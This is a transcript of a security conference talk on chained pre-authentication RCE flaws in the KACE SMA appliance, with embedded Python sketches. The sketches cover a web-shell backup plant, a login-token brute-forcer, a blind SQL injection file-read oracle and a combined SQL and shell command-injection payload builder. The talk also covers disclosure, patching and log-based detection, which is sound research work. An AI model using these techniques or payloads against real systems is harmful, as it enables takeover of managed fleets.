Today we are having the pre-auth RCE chains talk by Jeff Hoffman. I've got a couple of announcements before we get started. Please, everyone, continue to wear your masks while you're inside, and please don't congregate around the walls or outside; just come in and find a seat. If you want to come up a little closer, that'd be great. Here's Jeff. Hi. Thanks for coming to my talk, pre-auth RCEs on KACE SMA. Today I'm going to go over what KACE SMA is, the interesting attack surface of the product, the vulnerabilities that I found, and how I conducted my research, and I have a full exploit and demo to share with you at the end of the talk. So who am I? My name is Jeffrey Hoffman. I'm a security engineer at Nuro. I have a background in web and desktop apps as well as cloud and reverse engineering. I love to do security research and exploit dev in my free time, and anything else you might need to know about me, if I'm willing to share it, is on my website. So what are MDMs? MDM stands for mobile device management, and they're typically appliances used by IT to manage corporate devices like laptops or workstations. The way they usually work is they'll install a privileged binary, usually referred to as an agent, on whatever workstation you want to manage. That agent phones home to the MDM, picks up jobs to run, runs them, and reports back the status of those jobs. The jobs can be anything. They run as root or SYSTEM because sometimes those jobs require those privileges, for example, installing a certificate authority. But really, they're pretty versatile; the whole point is that IT can fully manage your device. That's good news for attackers. It makes them essentially single points of failure for an organization. If you got admin access to an MDM, you could do something like push out ransomware to all of the workstations at once.
More and more MDMs these days are on the internet with the rise of COVID and remote work, as well as the push to offer software-as-a-service; some of those MDMs just have to be on the internet out of necessity. So you have this great impact, you have them generally being internet-accessible if you support remote work, and you have this really interesting scenario where, if a company dogfoods or uses their own MDM, you could get into their employees' workstations, start pushing malicious backdoors, and even reach people who only host these MDMs on-prem. So, generally, a pretty interesting attack surface. KACE SMA, or KACE Systems Management Appliance, is an MDM developed by Quest. It's written in PHP. It's a relatively popular choice for hybrid work environments where you have Windows, Linux, and Mac workstations all in the same organization. There are about 2,000 of these things on the internet, including a SaaS offering that Quest hosts. A decent chunk of these are .gov and .edu domains, which implied to me that you might have a lot of very interesting PII readily available if you were to compromise something like this. In terms of what would be valuable, admin access is really the end-all be-all for these types of appliances. Every vulnerability that you find is more of a means to an end to get admin, because at the end of the day you don't really want to exploit vulnerabilities on the MDM itself; you want to use the intended functionality to pivot down to multiple devices at the same time. And just a little caveat for all the vulnerabilities I'm going to talk about: I didn't look at anything that would require user interaction. I felt like that was less interesting, so I have no idea what's out there in terms of XSS or CSRF for those types of bugs. So, because KACE SMA is written in PHP, getting an initial unrestricted shell was my top priority.
That was going to let me pull all the PHP code off the box, and then I could start source review and find more in-depth vulnerabilities. So I'm going to show you three tricks today that have generally been fruitful for me when attacking appliances. Your mileage may vary, but I always try these three things. The very first thing is just trying to break out of any restricted shells that might have been implemented. I installed KACE and read through the docs, and there were two default users, config and netdiag, and they both had restricted shells. Config was more of a text editor to change network settings, and it didn't have an immediately obvious way to run binaries, so I moved past that pretty quickly. Netdiag did have a more typical restricted shell, so I gathered all of the binaries that you could run and ran them through GTFOBins, which is a website that collects shell breakouts. The only thing that I found was this `arp -f` partial file read, which wasn't super useful for my case, because I wanted to read full PHP files, not partials. So that first trick didn't work. This second one is going to sound a little tongue in cheek, but a way that I always try to get my unrestricted shell is to look for post-auth RCE. And the nuance here is where that post-auth RCE can usually be found. Typically appliances, not just MDMs, want to have some sort of backup and restore process. That way you can support migrating to a new appliance if you need to, or just generally back up what IT has already set up, right? But the issue is that a lot of times those backups and restores are implemented as holistic backups and restores. If they include anything important, like maybe a binary or a very important config, and there's no integrity check on those backups, you're going to be able to overwrite it. From there it's usually context dependent, but the trick is just looking for important things in backups.
In the case of KACE, the web root was actually included in the backup, so my first unrestricted shell came from just planting a web shell in a backup and restoring it immediately. So I got access as www, which was definitely great. It was a good start. And, you know, not to beat up on Quest, this is just a really hard problem to solve. You have the desire to make your backups as holistic as possible, and it's generally hard to sanitize those backups. The integrity check is probably the way to go. But it's just generally going to be a fruitful attack surface for those reasons, combined with the fact that you almost always need admin on the appliance to trigger this functionality anyway, and the separation of privileges between being an admin on an MDM and being able to get RCE on it is almost non-existent. The admin is the more important feature. So RCE as www is definitely a great start, but ultimately you're going to want root to poke around a little more invasively. From here I could have either looked for privilege escalation or, and this is what I actually did, tried my third trick. This third trick is essentially the same as the backup and restore process, but you don't go in through the application. It revolves around the fact that if you own the appliance, you own the virtual machine's disk. You can simply unmount that virtual machine disk, mount it in a new virtual machine of the same operating system, and start overwriting whatever you want on that file system. So I targeted ndsh, which was the name of netdiag's custom restricted shell. I compiled a setuid wrapper around /bin/sh, set the setuid bit on it, chowned it to root, and overwrote ndsh with it.
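Going back to trick two for a moment, the backup-tampering idea can be sketched in a few lines. This is a hedged illustration, not the real KACE backup format: it assumes the backup is a plain gzipped tarball with the web root inside it and no integrity check, and the archive path `webroot/shell.php` is made up for the example.

```python
import io
import tarfile

# Illustrative web shell payload; the point is only that arbitrary PHP
# lands in the web root when the tampered backup is restored.
WEBSHELL = b"<?php system($_GET['c']); ?>"

def plant_webshell(backup_in, backup_out, arc_path="webroot/shell.php"):
    """Copy every member of the original backup, then append a web shell.
    Works only because (as described in the talk) there is no integrity
    check on the backup archive."""
    with tarfile.open(backup_in, "r:gz") as src, \
         tarfile.open(backup_out, "w:gz") as dst:
        for member in src.getmembers():
            # extractfile() returns None for directories; addfile handles that
            dst.addfile(member, src.extractfile(member))
        info = tarfile.TarInfo(arc_path)
        info.size = len(WEBSHELL)
        dst.addfile(info, io.BytesIO(WEBSHELL))
```

After restoring the tampered archive through the appliance's own restore feature, the shell is reachable under the web root.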
Once I logged in as netdiag, I was given a root shell right from the get-go, and from there I could do all the really nice things like adding a new root-equivalent user and enabling SSH, and generally I was able to be a little more invasive. So the first thing I did was gather all of the PHP code, and I also took this opportunity to just orient myself in the application. The logs directory was incredibly helpful, just grepping for strings that I saw in source and using that to validate assumptions. With root-level access, you know, there were no files that could hide; I could read everything, so I just spent some time trying to figure out how the appliance actually worked. In terms of attack surface, only 80 and 443, so the web UI, were open to the world by default. There was a high port that was exposed during the update process, but it was just a Golang binary that served an update log, so not particularly interesting. Because only the web UI was exposed, I could gather all of the unauthenticated attack surface by making a wordlist and just using Gobuster to brute force over all of the files that were accessible in that web root. You filter out the 403 Forbiddens, and you have a pretty good list of where to start. That approach is great, and it was definitely a good start, but it's a little naive, and you can do better by looking for the actual require statements of the authentication checks. In PHP, the way code gets imported is through the keyword require, and you can imagine auth.inc includes all the auth checks. Generally, you're looking for the imported file, and you're filtering out all the files that actually include it. That will give you an actual source of truth rather than the Gobuster method. The list generally didn't differ that much, but this is just a little more reliable, and you should note that it's not going to include recursive inclusions.
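The require-filtering approach can be sketched as a small script over the dumped source. The directory name and the auth include name (`auth.inc`) are assumptions standing in for the real KACE paths; as noted, a naive string check like this misses recursive inclusion.

```python
import os

def unauthenticated_candidates(root, auth_includes=("auth.inc",)):
    """Walk a dumped web root and list PHP files that never require the
    auth include. Files that do include it presumably run the auth checks;
    everything else is candidate unauthenticated attack surface."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as f:
                src = f.read()
            # Naive check: no mention of the auth include anywhere in the
            # file. This misses recursive inclusion (auth2 -> auth), which
            # would need a second pass over the includers themselves.
            if not any(inc in src for inc in auth_includes):
                hits.append(path)
    return hits

if __name__ == "__main__":
    for p in unauthenticated_candidates("webroot_dump"):
        print(p)
```

Compared to brute forcing with a wordlist, this reads the actual source of truth, so it also finds endpoints a wordlist would never guess.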
So you can imagine auth2 includes auth; you're going to have to grep for things that don't include auth2 or auth. At this point, I had a post-auth RCE, and I started thinking about whether or not an authentication bypass would be enough. Unfortunately, I didn't feel like it would be at the time. My post-auth RCE already required admin privileges, so that was already the goal; it wasn't really an extra vulnerability that I wanted. That meant that I would need a post-auth RCE with lower privilege requirements, or I would need to find a privilege escalation within the app. So I went hunting for those types of vulnerabilities, and there were calls to extract all over the application. If you're not intimately familiar with PHP, that's okay; a screenshot of the extract docs can be seen on screen. There's this big warning that says, do not use extract on attacker-controlled data, and that is because extract, by design, overwrites the symbol table in PHP. What that means is you can specify an attacker-controlled key and an attacker-controlled value, and if those are passed into a call to extract, a variable with the attacker-controlled key name will be instantiated, and it will be set to that attacker-controlled value. That's generally pretty useful; you can define whatever variables you want. But the cooler thing is that you can redefine variables that already exist. Two really great targets to go after are the globals, because they'll always be there, and the session variable, because that's how PHP tracks your identity. An unauthenticated call would let me set all of my session variables to whatever I wanted, essentially creating a full session from nothing. That would have been a great one-shot vulnerability to have, but unfortunately I couldn't find any unauthenticated uses of extract. Luckily, though, it was still called in about 100-plus places with attacker-controlled data throughout the app, so there were tons of different exploit strategies.
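The extract() pitfall can be modeled in Python as a dict merge, since that is effectively what clobbering the symbol table amounts to. This is an analogy, not PHP semantics, and the session key names (`KB_VALID_USER_SESSION`, `KB_PERMISSIONS`) are illustrative stand-ins for whatever KACE actually uses.

```python
def vulnerable_extract(symbol_table, request_params):
    """Rough analogue of PHP's extract($_REQUEST): every request key
    becomes a 'variable', silently clobbering anything already defined,
    including session state if that is what gets re-extracted."""
    symbol_table.update(request_params)
    return symbol_table

# Session as the server sees it for a logged-in, low-privilege user.
session = {"KB_VALID_USER_SESSION": True, "KB_PERMISSIONS": 0}

# Attacker-controlled query string, e.g. ?KB_PERMISSIONS=99
attacker = {"KB_PERMISSIONS": 99}

vulnerable_extract(session, attacker)
print(session["KB_PERMISSIONS"])   # 99: the attacker's chosen role integer
```

In PHP the fix is simply never passing attacker-controlled arrays to extract(), or using the `EXTR_SKIP` flag so existing variables are never overwritten.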
One cool one was that you could bypass 2FA, because your 2FA configuration was set within your session, so you could log in, hit an endpoint, say you didn't have 2FA, and you're good to go. The thing that's going to be really useful for this talk, though, is the direct privilege escalation. In KACE, they defined all of their permissions as just integers that mapped to different roles, so privilege escalating is as easy as going to a vulnerable endpoint, and here I'm picking on maillist.php, and setting your KB permissions to whatever number you want. You can just declare yourself a global sysadmin, and you are good to go, and you can start using all the admin functionality. Now, I didn't pick maillist.php at random. This is a pretty interesting file. I looked all over at these calls to extract for, like I said, ones without authentication checks, and I didn't find any of those, but maillist.php had a lighter authentication check than normal. It's not important that you understand what the full authentication check looked like, but what is important is that you understand that checking for KB valid user session was one of many checks that Quest intended to do. So this is just an ad hoc, partial authentication check that essentially meant you had logged in, not that you had a fully realized session. That just lowered the bar ever so slightly in terms of the kinds of authentication bypasses that would be useful. Now I have post-auth RCE and a great privilege escalation across multiple endpoints in the app, so I'm going to be able to reach admin and even trigger that RCE. So looking for authentication bypasses is now worth the time. Here's the first one I found. Essentially, Quest appeared to use MD5 and SHA1 password hashes once upon a time.
That was no longer the case when I looked at the app, but they did have to leave the legacy comparisons in so that users who had created their accounts when the password hashes were MD5 or SHA1 could still log in. Essentially, you'd log in if one of these checks succeeded; they would rehash your password and it would be rotated. What that code review told me was that there weren't going to be any MD5 or SHA1 hashes readily available, but if there was one, say an old account that had never had its password rotated, the loose comparisons in that code block on screen were significant. If you're not intimately familiar with PHP, that's okay. It's a dynamically typed language, and == is the loose comparison operator, as opposed to other languages where you would normally assume it's a strict comparison. What that means is PHP is going to try to infer the actual type of the value it's looking at, and that's typically referred to as type juggling. It'll try to coerce the value to a bunch of different types, and if one of those checks succeeds, the entire loose comparison succeeds. There are three examples on screen right now. The two bullets in red return false, but the bullet in green returns true. That is because in PHP, and just generally, a number followed by an e is interpreted as scientific notation. So when you have a hash or a string that starts with 0e and has all numerals after it, during that type juggling process PHP will interpret it as zero times ten to the power of something, and that's always zero. If you have two strings that aren't actually equivalent strings but are both of that magic hash format, when you do a loose comparison between them, it'll evaluate to true. And so I said that there probably wouldn't be any SHA1 or MD5 hashes in the database, but I needed to go and check anyway.
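The magic hash behavior can be demonstrated with a small Python model of PHP's loose comparison. Only the `0e<digits>` scientific-notation case relevant here is modeled; PHP's full type juggling rules are broader. The plaintext `240610708` is a well-known published value whose MD5 digest happens to have the magic format.

```python
import hashlib

def php_loose_eq(a: str, b: str) -> bool:
    """Rough model of PHP's == on two numeric-looking strings: both sides
    are coerced to numbers before comparing. '0e<digits>' parses as
    scientific notation, i.e. 0 * 10^n, which is always 0.0."""
    def as_number(s):
        try:
            return float(s)          # '0e1234' -> 0.0
        except ValueError:
            return None
    na, nb = as_number(a), as_number(b)
    if na is not None and nb is not None:
        return na == nb
    return a == b                    # fall back to a string comparison

# Two different strings, both of the magic-hash form 0e<digits>:
print(php_loose_eq("0e462097431906509019562988736854",
                   "0e830400451993494058024219903391"))   # True

# 240610708 is a known plaintext whose MD5 digest starts with 0e followed
# by only digits, so it loosely compares equal to any planted magic hash.
digest = hashlib.md5(b"240610708").hexdigest()
print(php_loose_eq(digest, "0e" + "3" * 30))              # True
```

This is exactly why the planted `0e333...` value in the database and the precomputed login password compare equal, even though neither is the hash of the other.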
Rather than recovering the root password, I just restarted the database locally with authentication disabled and added a root-equivalent user so that I could poke around. When I started looking at the actual password hash table, it confirmed my code review: there were these new, actually salted hashes for passwords. That meant that, to actually test, I had to add a new user and fake them having an old MD5 or SHA1 password hash. So I planted this 0e333... value. I have no idea what could possibly hash to that value, but it is of the magic hash format. To test, I used a precomputed value whose MD5 output is itself another magic hash. The hunch was that when those two things were compared, the comparison would evaluate to true and I could log in. In practice, after I planted that magic hash, I just submitted the precomputed value as my login password. The hashing went through, and you can see in the Location redirect that I wasn't kicked back to the login screen; it actually took me to a dashboard. So I successfully authenticated. Just to confirm my code review, I went and looked at the table afterwards, and the password migration did actually happen, so this vulnerability effectively amounts to a password change. Now, this is super cool and definitely an authentication bypass, but it has a few issues. First off, you have to get lucky. There's no way to control what somebody's password hash is going to come out to, so you're just hoping that whatever someone has submitted will somehow hash to this magic hash format. There was one interesting code path that made this attack a little more plausible. Essentially, KACE supported importing your entire user directory from LDAP. How this seemed to work in practice was that you would point it at LDAP and all your users would get imported, but they were imported as unprivileged accounts.
It seemed like what you were supposed to do was manually give privileges to the accounts that were actually supposed to access the app. But during that import, the password hashes were actually set to MD5 values. And you're importing your entire user directory, so not only do you have one MD5 value, you have tons and tons of these unactivated accounts. They don't have any permissions, but because of that ad hoc authentication check in maillist.php, that doesn't actually matter. When you log in as one of those unactivated accounts, this is what you'll actually see: you get kicked out to the login screen, and it says access denied, you are not authorized to access any of the tabs. Even when you look at the request and response, it appears like the login fails. You can tell this because it's resetting your KBOX ID, which was the session cookie, and normally when an app does that, it's saying, hey, restart the authentication flow. But that reset did not actually work. If you look at the session on disk, it has KB valid user session set. So you can resubmit that old session ID, hit maillist.php, and privilege escalate to admin just from these unactivated, unprivileged accounts that were never really supposed to be used. This is definitely a fully plausible attack scenario, but like I said, you have to get lucky. It requires them actually using this feature, and the odds aren't even that good if they are. So I moved on, looking for something better. The second authentication bypass I found was definitely slightly better in terms of exploitability, but it was a non-default feature. Quest doesn't make just KACE SMA; they make a bunch of different appliances. And one thing that they wanted to support for all of these is this magic login. You would pair two Quest appliances together, and they would generate tokens for each other that were redeemable at the other appliance.
When you are in one appliance, you click on a link generated for you, you redeem your token, and you are logged in as your user, but on the other appliance. The token generation can be seen on screen in bold. It is an MD5 hash, but there's no magic hashing going on; the real issue is that the input is essentially guessable. uniqid takes two arguments: the first is a prefix, the second is more entropy. The more-entropy part does not actually matter for this attack, but the prefix is generated by microtime, which is just the current time in microseconds. It's definitely not a secure random value to use. And when you look at the uniqid docs, you see that most of uniqid's entropy also comes from the current time in microseconds. So you essentially have the randomness coming from two calls to a totally guessable value. The attack in practice would look like brute forcing a bunch of different outputs for these two microtime calls, generating your tokens with the MD5 hashing, and just continuing to iterate until you guess the right token. So this is definitely more exploitable in practice; there's no luck involved. But it's non-default. No one's forcing anyone to buy two Quest appliances, and even if you have tons of Quest appliances, no one's forcing you to link them and actually use this functionality in the first place. So those are two of the three chains that I wanted to cover. They're not so great; they're really not reliably exploitable in practice. But the third one I'm about to cover is. Those were the only authentication bypasses that auditing the user attack surface turned up, and after I was done with that, I turned to the agent communication. My hope was that maybe authentication was implemented a little bit differently and I could find some more authentication bypasses there. And I actually landed in this one PHP file.
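The token brute force described above can be sketched as follows. This is a deliberately simplified model: the real exploit would have to reproduce PHP's exact uniqid() output format (the 13 hex characters come from `"%08x%05x"` of seconds and microseconds) and the exact microtime() prefix string, whereas here only the timestamp-derived core is shown.

```python
import hashlib
import time

def candidate_tokens(around_unix_time, window_us=2000):
    """Yield MD5 guesses for every microsecond in a window around the
    (roughly known) moment the token was generated. Because both
    microtime() and uniqid() derive their output from the clock, the
    search space is a few thousand guesses, not 2^128."""
    base_s = int(around_unix_time)
    base_us = int((around_unix_time - base_s) * 1_000_000)
    for delta in range(-window_us, window_us):
        us = base_us + delta
        s, us = base_s + us // 1_000_000, us % 1_000_000
        # Simplified stand-in for uniqid(): seconds+microseconds rendered
        # the way PHP formats uniqid's main 13 hex characters.
        guess = "%08x%05x" % (s, us)
        yield hashlib.md5(guess.encode()).hexdigest()

# Usage: submit each candidate to the token-redemption endpoint until one
# is accepted (network code omitted).
first = next(candidate_tokens(time.time()))
print(len(first))   # 32, an MD5 hex digest
```

The key takeaway is the one from the talk: seeding a security token with the current time gives an attacker a small, enumerable search space.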
There was clear command injection, but it was behind this ad hoc authentication check where you had to submit a secret parameter called serve. The command injection should be clear: org ID is attacker controlled, it taints temp location, which taints zip name, and then both of those variables are used in the call to exec. So I started digging into how serve was created; it was the only thing stopping me from triggering the command injection. As it turns out, serve is the hashed serial number of the appliance. It's essentially meant to be a bootstrapping secret for agents that, I guess, just wasn't unique to every agent, but that's a little easier than making a unique username and password or doing something else, so it was like that for convenience. It was also good news for me. The serve parameter was the SHA-256 hash of the serial number, so an unauthenticated LFI would work, because the actual function that retrieved the serial number just read it from disk. If I could retrieve the serial number like that with my LFI, I would be able to calculate serve myself, and I would be able to exploit the command injection. Unfortunately, depending on the installation type, the serial number would be stored in one of three places, and one of those file names had the MAC address of the device appended to it. So I would need a way to leak the MAC address of the device before I could actually exploit this in the worst case. Luckily for me, when you log in, the MAC address is presented to you, and the contents of that message are actually stored in /etc/issue, which is world readable. So if you had an LFI, you could read /etc/issue, pull the MAC address, then in the worst case read that file name, pull the serial number, and calculate serve to bypass authentication. Knowing that, I went around and audited high and low for unauthenticated LFIs, and I came up empty handed.
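The client side of that bypass is tiny once the file reads exist. The sketch below assumes only what the talk states: serve is the SHA-256 hex digest of the serial number, and the MAC address appears somewhere in the leaked /etc/issue contents. The /etc/issue layout and the serial file path are placeholders.

```python
import hashlib
import re

def mac_from_issue(issue_text):
    """Pull the first MAC-address-looking token out of leaked /etc/issue
    contents (retrieved via the file-read primitive)."""
    m = re.search(r'([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})', issue_text)
    return m.group(1) if m else None

def serve_param(serial_number):
    # serve = SHA-256 hex digest of the appliance serial number
    return hashlib.sha256(serial_number.encode()).hexdigest()

# Example with placeholder leaked contents:
issue = "Welcome to the appliance\nMAC: 08:00:27:aa:bb:cc\n"
mac = mac_from_issue(issue)
serial_path = f"/path/derived/from/{mac}"   # placeholder for the real path
print(mac, len(serve_param("ABC123")))      # 08:00:27:aa:bb:cc 64
```

With the MAC in hand, the worst-case serial file name can be constructed, the serial read, and serve computed offline with no further interaction.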
So I took a step back and started thinking about what I could use as an LFI equivalent. As it turns out, the SQL queries made by the app were being made as the root user, which meant that if I could find SQL injection, I would be able to use directives like LOAD_FILE to read contents from disk. Depending on the SQL injection's quality, I would be able to use it in the same way I'd use an LFI. A single LFI was all that was needed, and the code block on screen is actually in the same file as the command injection, but it comes before the check for serve, so technically it's unauthenticated. It's not important that you remember exactly what's going on here. What is important is that you remember validate org comes first and validate agent version comes second. If either of those queries fails, the app 404s and exits immediately. Validate agent version has clear SQL injection; you can see org ID is just directly placed in the SQL query string. But validate org comes first, and unfortunately org ID is properly parameterized there. So when I was doing code review, this looked unexploitable. The org IDs stored in the database are stored as integers, and I can't make an SQL injection payload out of integers. Luckily for me, though, I was just spraying around some testing payloads to locate the relevant logs, and I accidentally hit the SQL injection in validate agent version. I didn't really understand how that was even possible, so I had to work backwards from it. What had happened was that MariaDB actually type juggles. This is in their docs; it's a convenience feature for strings with differing units, and an example use case of this feature is on screen.
It's inferred that the developer writing this query really does want to operate on these two values with differing units, so if MariaDB sees a string that starts with numerals and then contains non-numeric text, it interprets the text as units and just drops it. The validate org query looks exactly like this: if you just append the SQL injection payload, it gets dropped, MariaDB happily treats the value as just a 1, and the query actually returns successfully. So, pretty cool. That means we can actually hit the SQLi in validate agent version, but there are still a few issues to work around. First off, SQL responses aren't visible. Secondly, basename is called on org ID, which means that we can't directly pass in paths of the files we want to read, like /etc/issue, because the payload would be truncated. And finally, org ID has to be valid SQL and valid command injection at the same time, because we need validate agent version to succeed when we actually trigger the command injection. To start working around that, the first thing I did was create a blind SQL oracle, essentially abusing the behavior of that immediate 404. When queries fail, the app 404s; when queries succeed, the app eventually returns a 200. So just by looking at the HTTP response codes, you can infer the outcome of the comparison in the SQL injection. That's definitely useful, but we still have to get around that second constraint of basename being called. The way I did that was just using the CONCAT directive. All of this is nested within a call to LOAD_FILE; 0x2f is the integer value for the ASCII forward slash, and the output of the CONCAT call results in /etc/issue, which can then be passed directly to LOAD_FILE.
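The blind oracle can be sketched as follows. The HTTP endpoint, parameter layout, and exact injected condition are assumptions, so the network call is abstracted into an injected `probe` callable; here a fake responder stands in for the appliance so the byte-leaking logic itself is self-contained and runnable.

```python
import string

# MAC and serial are drawn from a small alphabet, so per-byte brute force
# is cheap. hexdigits plus ':' covers a MAC address.
CHARSET = string.hexdigits + ":"

def leak_byte(probe, path, offset, charset=CHARSET):
    """Brute-force one byte of LOAD_FILE(path) via status codes: a 200
    means the injected comparison was true, a 404 means it was false.
    A real payload wraps the path in CONCAT(0x2f, ...) to dodge basename()
    and uses LOCATE() to find the interesting offset dynamically."""
    for ch in charset:
        condition = f"SUBSTRING(LOAD_FILE({path}),{offset},1)='{ch}'"
        if probe(condition) == 200:
            return ch
    return None

def leak_string(probe, path, start, length):
    return "".join(leak_byte(probe, path, start + i) or "?" for i in range(length))

# Demo with a fake server that "contains" a secret file:
SECRET = "08:00:27:aa:bb:cc"
def fake_probe(cond):
    # Crude parse of the injected condition to emulate the DB's answer.
    off = int(cond.split(",")[1]) - 1          # SQL offsets are 1-indexed
    ch = cond.rsplit("'", 2)[1]
    return 200 if off < len(SECRET) and SECRET[off] == ch else 404

# 0x2f6574632f6973737565 is '/etc/issue' as a hex literal, another way to
# avoid putting a literal slash in the parameter.
print(leak_string(fake_probe, "0x2f6574632f6973737565", 1, len(SECRET)))
```

One request per character guess adds up, which is also why the talk notes a timing side channel would have worked as a fallback oracle.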
I still needed to pull out single bytes to make my oracle useful, and the way I chose to do that was dynamically, rather than with hard-coded offsets. I used LOCATE with LOAD_FILE to find the starting offset of the things I actually wanted to brute force, and then I used SUBSTRING to pull out a single byte. Then I could just brute force the MAC address and serial number, because they were alphanumeric, so a relatively small search space. The full strategy as I just described it will work: you can use the SQLi to read your two local files, calculate serve, and then trigger your command injection. We just have that last pesky issue of needing a payload that is valid SQL and valid command injection, and the payload I used to get around that can be seen on screen. Essentially, the semicolon delimits the SQL. I used hyphen hyphen, which is a comment in MariaDB; you can't use the pound sign because it would comment out your command injection. And then the dollar sign and parentheses should be pretty recognizable. To get around basename for payloads, I just wrapped it all in Base64. From here I could trigger my RCE unauthenticated as www, but I really wanted root, just because I thought it would be more fun. So I ripped this methodology straight from the OSCP: I just looked for custom things running as root, and there were a few PHP files that I immediately started looking at, because they were going to be really easy to audit. One of the things that I looked at was called KB server. The long and short of it was that it listened on a world-writable Unix socket, and it was listening for commands in the form of command, argument, argument. There were a bunch of different handlers, or commands, that you could run. One of the interesting ones is shown on screen now, and it does essentially what the name of the command implies.
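The dual-context payload can be sketched like this. The exact quoting around the exec() sink is not shown in the transcript, so the precise shape here is an assumption; what it illustrates is the three constraints the talk names: survive MariaDB's numeric truncation, terminate the SQL with `;` and `-- ` (the pound sign would comment out the shell part too), and carry the command in `$( )` with the real command Base64-wrapped so basename() can't eat its slashes.

```python
import base64

def build_payload(shell_cmd):
    """Construct one string that is simultaneously tolerable SQL and a
    valid shell fragment (shape is illustrative, not the exact exploit)."""
    # basename() would truncate at slashes, so ship the command Base64-
    # encoded and decode it on the target before piping to sh.
    b64 = base64.b64encode(shell_cmd.encode()).decode()
    inner = f"echo {b64}|base64 -d|sh"
    # Leading "1": MariaDB type juggling drops the trailing "units" and
    #   treats the value as the integer 1, so validate org succeeds.
    # ";": ends the injected SQL statement.
    # "-- ": MariaDB comment, hiding the shell part from the SQL parser.
    # "$( )": command substitution once the string reaches exec().
    return f"1;-- $({inner})"

print(build_payload("id > /tmp/pwned"))
```

The same value passes through both parsers with each one ignoring the half meant for the other, which is the whole trick.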
It takes an attacker-controlled source, moves it to an attacker-controlled destination, and then, for good measure, chowns it to www. That is a relatively straightforward logical privilege escalation: you could overwrite an important binary or some important file. But I chose to abuse the command injection that was in the actual implementation of the handler. So here's the current state: the two chains on the right and left aren't really reliable or so great, but the middle one is, and you can execute commands as root from an unauthenticated perspective. And so now I have a demo to show you. Oh great, it's already up. All right, so the first thing it does is check that it can trigger the SQL injection; that's so it knows whether the appliance is vulnerable or not. Right now it's just using the SQLi techniques to leak the MAC address. After that, it starts leaking the serial number from the file in that worst case, which is what was used in VirtualBox installations. It's kind of interesting to note that the timer you see spinning actually gets spun every time a response comes in, and you can see it hang on the successful guesses, because KACE does a little bit more processing. So even if we couldn't have made this oracle, we could have done a timing attack or maybe some other technique to leak this data. After this finishes, you're going to see it run commands as root. It's actually going to set up a setuid bash shell so that I don't have to go through two command injection contexts; it makes running payloads a little easier. And it's going to happen really, really quickly. It's going to make a new admin and make a script that gets pushed out to all of the devices in the org. That script is pretty mundane; it's just going to change the background to that cowboy cat picture. But it happens just this quickly, and in a few seconds you'll see the device that I'm running this payload on top of.
It's registered in my org, and it'll pull down that job, run it, and the background will change. All right. And, you know, obviously, thanks. Obviously, a real attacker wouldn't do that; they would probably do something more malicious, like deploy ransomware. But hopefully that gets the point across. I should say the full exploit for that is available on my GitHub, and it was also shared with the speaker materials. I defanged the exploit script a little bit; it didn't seem appropriate to release something that just works like that out of the box. But it does run commands as root, so it's enough to demonstrate that these vulnerabilities do work like this in practice. Now, in terms of detecting this, the general access log for KACE is actually good enough to catch all of it, because org IDs are supposed to be integers, and the initial SQL injection request is just a GET. So you can filter for any org ID that's not strictly an integer, and you'll be able to know whether the attack actually happened. Now I have some closing reflections that I want to share with you. First off, as much as I wish I could say this was new and novel work, it actually wasn't. A firm called Core Security reported very, very similar vulnerabilities, if not the same ones, in 2018. The SQLi was reported, and I never got to see the unpatched code, but my best guess is that the fix for it was actually just parameterizing org ID in the first place. That totally makes sense to me. I, through code review, missed that this would still be exploitable, so I could see how the security researchers and Quest all could have missed it too. I definitely would have missed it if I hadn't gotten lucky. But it just goes to highlight the importance of explicit versus implicit sanitization. If the explicit sanitization had been done, this weird MariaDB convenience feature would never have mattered.
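The access-log filter described a moment ago can be sketched in a few lines. The log line format and the parameter name (`orgid`) are assumptions for illustration; the real filter would use whatever the KACE access log and agent endpoint actually call it.

```python
import re

# Org IDs are supposed to be plain integers, so any request where the org
# ID parameter is not strictly an integer is a strong indicator of the
# SQL injection attempts described above.
ORG_ID_RE = re.compile(r'[?&]orgid=([^&\s"]+)', re.IGNORECASE)

def suspicious_lines(log_lines):
    """Yield access-log lines whose org ID parameter is non-numeric."""
    for line in log_lines:
        m = ORG_ID_RE.search(line)
        if m and not m.group(1).isdigit():
            yield line

# Demo against two synthetic log lines:
log = [
    'GET /service/foo.php?orgid=1 HTTP/1.1',
    'GET /service/foo.php?orgid=1;--%20$(id) HTTP/1.1',
]
for hit in suspicious_lines(log):
    print(hit)   # only the injected request is flagged
```

Because the injection rides in a plain GET parameter, this catches historical attacks too, not just live ones, as long as the access logs were retained.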
As far as the RCE, I'm a little more confident that this was new, because the payload that they had shown and described didn't include this MSI parameter that was required to hit the vulnerable code path for my command injection. Regardless of whether it was a reintroduction or maybe a regression, it was probably also assumed that org ID was never going to be attacker controlled like that. Again, that convenience feature in MariaDB really bit the developers in the butt. So explicit versus implicit sanitization is definitely the way to go. You just remove so much unknown unknown when you do that, and effectively guarantee that you'll never have to worry about it. But both of these vulnerabilities together also, for me at least, highlighted the importance of defense in depth. I never would have been able to read files if SQL queries weren't being made as root; the exploitation would have stopped there, and the command injection would never have been reachable. Here's the total timeline for the disclosure. I contacted them on 4/20, and the very next day I had a meeting with the Quest team to explain essentially everything that I found. They were pretty concerned and responsive, and they released a hot patch relatively quickly. We actually mutually chose to withhold the CVEs, so I haven't talked about any of the CVE numbers. They are out now, but I didn't get a chance to put them in my speaker materials, because those were due a little earlier than the CVEs were released. The patch was out on 5/11, and they sent very, very strongly worded communication to their customers, consistently urging them to patch; patch acceptance was relatively high, even in those first two weeks. The CVEs were withheld essentially because the app is PHP.
Patch diffing is almost trivial, and it wouldn't really have been fair to those customers to release this very critical CVE and have motivated attackers patch diff quicker than customers can schedule a regular patch. Finally, I just want to give some credits and thanks. Again, it really pains me to say this, but credit to Core Security for beating me to this. I wasn't guided by their research; I didn't know about the CVEs until after the fact. Probably my fault. I would have saved myself some time if I had looked for existing CVEs before I started looking into this. Credit to Michal Špaček for making that precomputed magic hash value that I used. And then I just want to thank Nuro, the company that I work at now, for giving me the opportunity to do such interesting and impactful work. And I want to give a huge thanks to John Novak, a former co-worker at Praetorian. He taught me a ton about appliance hacking and showed me some of those neat tricks that I got to share with you today. And by extension, thanks to Praetorian for just being a great environment to learn in. So I will take any questions. Thank you for coming to my talk.